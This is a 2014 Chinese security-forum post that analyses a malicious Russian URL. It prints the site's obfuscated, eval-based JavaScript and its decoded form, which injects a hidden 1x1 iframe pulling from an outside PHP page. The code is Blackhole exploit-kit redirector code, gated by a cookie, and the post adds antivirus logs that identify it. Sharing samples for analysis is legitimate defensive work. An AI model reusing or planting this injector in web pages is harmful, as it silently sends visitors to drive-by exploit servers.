收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://doska.dybroff.ru/spros/42?order=title_1
返回列表 发新帖
查看: 1982|回复: 0
收起左侧

[已鉴定] http://doska.dybroff.ru/spros/42?order=title_1

[复制链接]
fireold
发表于 2014-1-25 07:08:17 | 显示全部楼层 |阅读模式
  1. /*bf760a*/
  2. ps = "split";
  3. asd = function() {
  4.     d.body++
  5. };
  6. a = ("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,161,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,161,152,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,172,145,164,163,171,166,167,145,155,162,170,167,62,147,163,62,171,157,63,145,150,161,155,162,63,150,170,150,62,164,154,164,53,77,21,16,44,161,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,161,152,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,161,152,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,161,152,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,161,152,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,161,152,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,161,152,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,161,152,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,161,152,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,161,152,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16" [ps](","));
  7. ss = String;
  8. d = document;
  9. for (i = 0; i < a.length; i += 1) {
  10.     a[i] = -(7 - 3) + parseInt(a[i], 8);
  11. }
  12. try {
  13.     asd()
  14. } catch (q) {
  15.     zz = 0;
  16. }
  17. try {
  18.     zz /= 2
  19. } catch (q) {
  20.     zz = 1;
  21. }
  22. if (!zz) if (window["document"]) eval(ss.fromCharCode.apply(ss, a)); /*/bf760a*/
复制代码

  1. function zzzfff() {
  2.      var i = document.createElement('iframe');

  4.      i.src = 'http://vapoursaints.co.uk/admin/dtd.php';
  5.      i.style.position = 'absolute';
  6.      i.style.border = '0';
  7.      i.style.height = '1px';
  8.      i.style.width = '1px';
  9.      i.style.left = '1px';
  10.      i.style.top = '1px';

  12.      if (!document.getElementById('i')) {
  13.          document.write('<div id=\'i\'></div>');
  14.          document.getElementById('i').appendChild(i);
  15.      }
  16. }

  18. function SetCookie(cookieName, cookieValue, nDays, path) {
  19.      var today = new Date();
  20.      var expire = new Date();
  21.      if (nDays == null || nDays == 0) nDays = 1;
  22.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  23.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  24. }

  26. function GetCookie(name) {
  27.      var start = document.cookie.indexOf(name + "=");
  28.      var len = start + name.length + 1;
  29.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  30.          return null;
  31.      }
  32.      if (start == -1) return null;
  33.      var end = document.cookie.indexOf(";", len);
  34.      if (end == -1) end = document.cookie.length;
  35.      return unescape(document.cookie.substring(len, end));
  36. }
  37. if (navigator.cookieEnabled) {
  38.      if (GetCookie('visited_uq') == 55) {} else {
  39.          SetCookie('visited_uq', '55', '1', '/');

  41.          zzzfff();
  42.      }
  43. }
复制代码


Avira
2014/1/25 上午 07:05 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\drupal[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.264' [virus]
      已採取動作:
      檔案會移動至 '5a09527d.qua' 名稱底下的隔離區目錄!

2014/1/25 上午 07:05 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        800
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2014/1/25 上午 07:04 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\42[1].htm'
      包含病毒或有害的程式 'JS/Blacole.EB.264' [virus]
      已採取動作:
      檔案會移動至 '5bb55f94.qua' 名稱底下的隔離區目錄!

2014/1/25 上午 07:04 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        800
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2014/1/25 上午 07:04 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\drupal[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.264 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/25 上午 07:03 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\42[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.264 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/25 上午 07:03 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\drupal[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.264 [virus]'
      執行的動作:拒絕存取

2014/1/25 上午 07:03 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\42[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.264 [virus]'
      執行的動作:拒絕存取

2014/1/25 上午 07:03 [Web Protection] 已停用 Web Protection
      服務已停用

2014/1/25 上午 07:03 [Web Protection] 封鎖的網頁
      URL (http://doska.dybroff.ru/spros/42?order=title_1) 的評估結果為 惡意程式碼,而遭到封鎖.


av2.jpg



fs is
fs2.jpg
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 17:51 , Processed in 0.154641 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表